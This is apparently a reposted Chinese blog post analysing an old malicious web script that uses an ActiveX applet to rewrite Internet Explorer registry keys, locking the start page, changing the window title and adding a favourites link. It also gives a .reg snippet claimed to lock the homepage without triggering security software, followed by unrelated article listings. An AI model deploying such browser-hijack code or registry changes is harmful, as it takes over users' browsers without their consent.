一段恶意脚本的分析及思考

简介:

这段代码主要实现了通过javascript修改注册表中的信息,不过现在所有杀软都已列入了黑名单,代码中的F935DC26-1CF0-11D0-ADB9-00C04FD58A0B 这个字符串在目前的电脑中已经不存在了,但是分析这段代码还有其它的收获,代码如下:

 

 
  1. <script>  
  2. document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");  
  3. function AddFavLnk(loc, DispName, SiteURL)  
  4. {  
  5. var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");  
  6. Shor.TargetPath = SiteURL;  
  7. Shor.Save();  
  8. }  
  9. function f(){  
  10. try 
  11. {  
  12. //ActiveX 初始化  
  13. a1=document.applets[0];  
  14. a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");  
  15. a1.createInstance();  
  16. Shl = a1.GetObject();  
  17. a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");  
  18. a1.createInstance();  
  19. FSO = a1.GetObject();  
  20. a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");  
  21. a1.createInstance();  
  22. Net = a1.GetObject();  
  23. try 
  24. {  
  25. if (document.cookie.indexOf("Chg") == -1)  
  26. {  
  27. //设置Cookie  
  28. var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));  
  29. document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  30. //设置Cookie完毕  
  31. //设置主页  
  32. Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page""http://sucre.javaeye.com/");  
  33. //修改浏览器的标题  
  34. Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title""你的Internet Explorer已经被修改过了 By Sucre");  
  35. //锁定浏览器首页  
  36. Sh1.RegWrite("HKCR\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\@","'\"C:\\Program Files\\Internet Explorer\\IExplore.exe\"' http://sucre.javaeye.com");  
  37. //设置Cookie  
  38. var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));  
  39. document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  40. var WF, Shor, loc;  
  41. WF = FSO.GetSpecialFolder(0);  
  42. loc = WF + "\\Favorites";  
  43. if(!FSO.FolderExists(loc))  
  44. {  
  45. loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";  
  46. if(!FSO.FolderExists(loc))  
  47. {  
  48. return;  
  49. }  
  50. }  
  51. AddFavLnk(loc, "我的博客""http://sucre.blog.51cto.com");  
  52. }  
  53. }  
  54. catch(e)  
  55. {}  
  56. }  
  57. catch(e)  
  58. {}  
  59. }  
  60.  
  61.  
  62.  
  63. function init()  
  64. {  
  65. setTimeout("f()", 1000);  
  66. }  
  67. init();  
  68. </script> 

 其实,用其它脚本也可以实现锁定主页,比如批处理,下面这段代码就锁住了主页,一开IE就会显示指定的页面,这种指向方法所有的防护软件都不会报警,代码如下:

 
  1. Windows Registry Editor Version 5.00  
  2.  
  3. [HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]  
  4.  
  5. @="\"C:\\Program Files\\Internet Explorer\\IExplore.exe\" http://sucre.blog.51cto.com"  

 以上文字仅供学习交流,不要用于非法操作,否则后果自负!



本文转自sucre03 51CTO博客,原文链接:http://blog.51cto.com/sucre/380581,如需转载请自行联系原作者

相关文章
|
5天前
|
搜索推荐 编译器 Linux
一个可用于企业开发及通用跨平台的Makefile文件
一款适用于企业级开发的通用跨平台Makefile,支持C/C++混合编译、多目标输出(可执行文件、静态/动态库)、Release/Debug版本管理。配置简洁,仅需修改带`MF_CONFIGURE_`前缀的变量,支持脚本化配置与子Makefile管理,具备完善日志、错误提示和跨平台兼容性,附详细文档与示例,便于学习与集成。
307 116
|
20天前
|
域名解析 人工智能
【实操攻略】手把手教学,免费领取.CN域名
即日起至2025年12月31日,购买万小智AI建站或云·企业官网,每单可免费领1个.CN域名首年!跟我了解领取攻略吧~
|
7天前
|
数据采集 人工智能 自然语言处理
Meta SAM3开源:让图像分割,听懂你的话
Meta发布并开源SAM 3,首个支持文本或视觉提示的统一图像视频分割模型,可精准分割“红色条纹伞”等开放词汇概念,覆盖400万独特概念,性能达人类水平75%–80%,推动视觉分割新突破。
505 45
Meta SAM3开源:让图像分割,听懂你的话
|
14天前
|
安全 Java Android开发
深度解析 Android 崩溃捕获原理及从崩溃到归因的闭环实践
崩溃堆栈全是 a.b.c?Native 错误查不到行号?本文详解 Android 崩溃采集全链路原理,教你如何把“天书”变“说明书”。RUM SDK 已支持一键接入。
695 222
|
2天前
|
Windows
dll错误修复 ,可指定下载dll,regsvr32等
dll错误修复 ,可指定下载dll,regsvr32等
137 95
|
12天前
|
人工智能 移动开发 自然语言处理
2025最新HTML静态网页制作工具推荐:10款免费在线生成器小白也能5分钟上手
晓猛团队精选2025年10款真正免费、无需编程的在线HTML建站工具,涵盖AI生成、拖拽编辑、设计稿转代码等多种类型,均支持浏览器直接使用、快速出图与文件导出,特别适合零基础用户快速搭建个人网站、落地页或企业官网。
1711 158
|
存储 人工智能 监控
从代码生成到自主决策:打造一个Coding驱动的“自我编程”Agent
本文介绍了一种基于LLM的“自我编程”Agent系统,通过代码驱动实现复杂逻辑。该Agent以Python为执行引擎,结合Py4j实现Java与Python交互,支持多工具调用、记忆分层与上下文工程,具备感知、认知、表达、自我评估等能力模块,目标是打造可进化的“1.5线”智能助手。
953 62